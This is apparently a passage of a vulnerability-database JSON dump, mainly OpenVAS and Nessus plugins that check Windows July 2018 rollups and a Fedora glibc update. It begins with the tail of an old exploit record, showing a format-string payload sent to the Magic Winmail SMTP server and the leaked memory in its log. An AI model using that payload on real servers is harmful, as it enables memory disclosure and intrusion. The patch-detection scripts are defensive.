0x%.8x 0x%.8x 0x%.8x 0x%.8x \r\n0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.\r\n8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x \r\n0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x\r\n502 unimplemented (#5.5.1)\r\n */\r\n\r\n/*\r\nD:\\>type \"c:\\Program Files\\Magic Winmail\\server\\logs\\smtp.log\"\r\n0906/Y-01:50:30 1548 Connect from 127.0.0.1\r\n0906/Y-01:51:06 1584 unrecognized command = AAAA 0x00498f71 0x0176fd10 \r\n0x0176fe3c 0x000000eb 0x0176ff80 0x00ee6c80 0x00000050 0x00ee60d9 0x00000102 \r\n0x0000011f 0x00000050 0x00eecf71 0x0000001c 0x0000001f 0x0176ff74 0x004cd2c0 \r\n0x00000001 0x00493e40 0x0176fd50 
0x00000000 0x00ee5ea8 0x00ee5ea8 0x41414141 \r\n0x25783020 0x2078382e 0x2e257830 0x30207838 0x382e2578 0x78302078 0x78382e25 \r\n0x25783020 0x2078382e 0x2e257830\r\n\r\n*/\r\n\r\n\r \n\n# 0day.today [2018-03-19] #", "published": "2003-06-11T00:00:00", "references": [], "reporter": "ThreaT", "modified": "2003-06-11T00:00:00", "href": "https://0day.today/exploit/description/8314"}
{"openvas": [{"lastseen": "2019-05-29T18:33:16", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4338829", "modified": "2019-05-03T00:00:00", "published": "2018-07-11T00:00:00", "id": "OPENVAS:1361412562310813649", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813649", "title": "Microsoft Windows Multiple Vulnerabilities (KB4338829)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4338829)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813649\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8282\", \"CVE-2018-8284\", \"CVE-2018-0949\", \"CVE-2018-8125\",\n \"CVE-2018-8202\", \"CVE-2018-8206\", \"CVE-2018-8222\", \"CVE-2018-8242\",\n \"CVE-2018-8280\", \"CVE-2018-8287\", \"CVE-2018-8288\", \"CVE-2018-8290\",\n \"CVE-2018-8291\", \"CVE-2018-8296\", \"CVE-2018-8304\", \"CVE-2018-8307\",\n \"CVE-2018-8308\", \"CVE-2018-8309\", \"CVE-2018-8313\", \"CVE-2018-8314\",\n \"CVE-2018-8356\", \"CVE-2018-3665\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-07-11 11:15:15 +0530 (Wed, 11 Jul 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4338829)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4338829\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to errors,\n\n - When Windows improperly handles File Transfer Protocol (FTP) connections.\n\n - When Chakra scripting engine improperly handles objects in memory in\n browsers.\n\n - When Windows Kernel API improperly enforces permissions.\n\n - when Windows improperly handles objects in memory.\n\n - When the Windows kernel fails to properly handle objects in memory.\n\n - When 
Microsoft WordPad improperly handles embedded OLE objects.\n\n - When the scripting engine improperly handles objects in memory in\n Microsoft browsers.\n\n - When Windows fails a check, allowing a sandbox escape.\n\n - A security feature bypass vulnerability exists in Device Guard.\n\n - When Microsoft Internet Explorer improperly handles requests involving\n UNC resources.\n\n - When the Windows kernel-mode driver fails to properly handle objects in memory.\n\n - When Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to cause a target system to stop responding, elevate their privilege level,\n run arbitrary code, bypass security, disclose sensitive information and also\n take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 for 32-bit Systems\n\n Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4338829\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17913\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.17913\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:12", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4338818", "modified": "2019-05-03T00:00:00", "published": "2018-07-11T00:00:00", "id": "OPENVAS:1361412562310813645", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813645", "title": "Microsoft Windows Multiple Vulnerabilities (KB4338818)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4338818)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# 
Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813645\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8282\", \"CVE-2018-0949\", \"CVE-2018-8206\", \"CVE-2018-8242\",\n \"CVE-2018-8287\", \"CVE-2018-8288\", \"CVE-2018-8291\", \"CVE-2018-8296\",\n \"CVE-2018-8304\", \"CVE-2018-8307\", \"CVE-2018-8308\", \"CVE-2018-8309\",\n \"CVE-2018-8314\", \"CVE-2018-3665\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-07-11 09:15:58 +0530 (Wed, 11 Jul 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4338818)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4338818\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to errors,\n\n - When Internet Explorer improperly 
accesses objects in memory.\n\n - When Windows improperly handles File Transfer Protocol (FTP) connections.\n\n - When the scripting engine improperly handles objects in memory in Internet\n Explorer.\n\n - When Windows kernel-mode driver fails to properly handle objects in memory.\n\n - When Windows Domain Name System (DNS) DNSAPI.dll fails to properly handle\n DNS responses.\n\n - When Microsoft WordPad improperly handles embedded OLE objects.\n\n - When Windows fails a check, allowing a sandbox escape.\n\n - Involving side channel speculative execution, known as Lazy FP State Restore.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to bypass security, cause a target system to stop responding, execute arbitrary\n code in the context of the current user and elevate privileges on an affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4338818\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Kernel32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.24168\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Kernel32.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24168\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-01-08T12:53:29", "bulletinFamily": "scanner", "description": "Check for the Version of glibc", "modified": "2018-01-08T00:00:00", "published": "2010-12-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862646", "id": "OPENVAS:1361412562310862646", "title": "Fedora Update for glibc FEDORA-2010-16308", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glibc FEDORA-2010-16308\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; 
you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"glibc on Fedora 14\";\ntag_insight = \"The glibc package contains standard libraries which are used by\n multiple programs on the system. In order to save disk space and\n memory, as well as to make upgrading easier, common system code is\n kept in one place and shared between programs. This particular package\n contains the most important sets of shared libraries: the standard C\n library and the standard math library. 
Without these two libraries, a\n Linux system will not function.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/049665.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862646\");\n script_version(\"$Revision: 8314 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 09:01:01 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_xref(name: \"FEDORA\", value: \"2010-16308\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3847\");\n script_name(\"Fedora Update for glibc FEDORA-2010-16308\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12.90~17\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": 
"2019-11-05T11:37:29", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4338829.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8280, CVE-2018-8290)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. 
An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8125)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8222)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. 
(CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. 
Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_JUL_4338829.NASL", "href": "https://www.tenable.com/plugins/nessus/110986", "published": "2018-07-10T00:00:00", "title": "KB4338829: Windows 10 July 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110986);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-0949\",\n \"CVE-2018-8125\",\n \"CVE-2018-8202\",\n \"CVE-2018-8206\",\n \"CVE-2018-8222\",\n \"CVE-2018-8242\",\n \"CVE-2018-8280\",\n \"CVE-2018-8282\",\n \"CVE-2018-8284\",\n \"CVE-2018-8287\",\n \"CVE-2018-8288\",\n \"CVE-2018-8290\",\n \"CVE-2018-8291\",\n \"CVE-2018-8296\",\n \"CVE-2018-8304\",\n \"CVE-2018-8307\",\n \"CVE-2018-8308\",\n \"CVE-2018-8309\",\n \"CVE-2018-8313\",\n \"CVE-2018-8314\",\n \"CVE-2018-8356\"\n );\n script_bugtraq_id(\n 104617,\n 104620,\n 104622,\n 104623,\n 104629,\n 104631,\n 104634,\n 104635,\n 104636,\n 104637,\n 104638,\n 104642,\n 104644,\n 104648,\n 104652,\n 104664,\n 104665,\n 104667,\n 104668,\n 104669,\n 104670\n );\n script_xref(name:\"MSKB\", value:\"4338829\");\n script_xref(name:\"MSFT\", value:\"MS18-4338829\");\n\n script_name(english:\"KB4338829: Windows 10 July 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4338829.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8280, CVE-2018-8290)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. 
(CVE-2018-8206)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8125)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8222)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. 
(CVE-2018-8307)\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. 
However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)\");\n # https://support.microsoft.com/en-us/help/4338829/windows-10-update-kb4338829\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0a3fc8a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4338829.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-07\";\nkbs = make_list('4338829');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"07_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4338829])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:37:28", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4338824\nor cumulative update 4338815. 
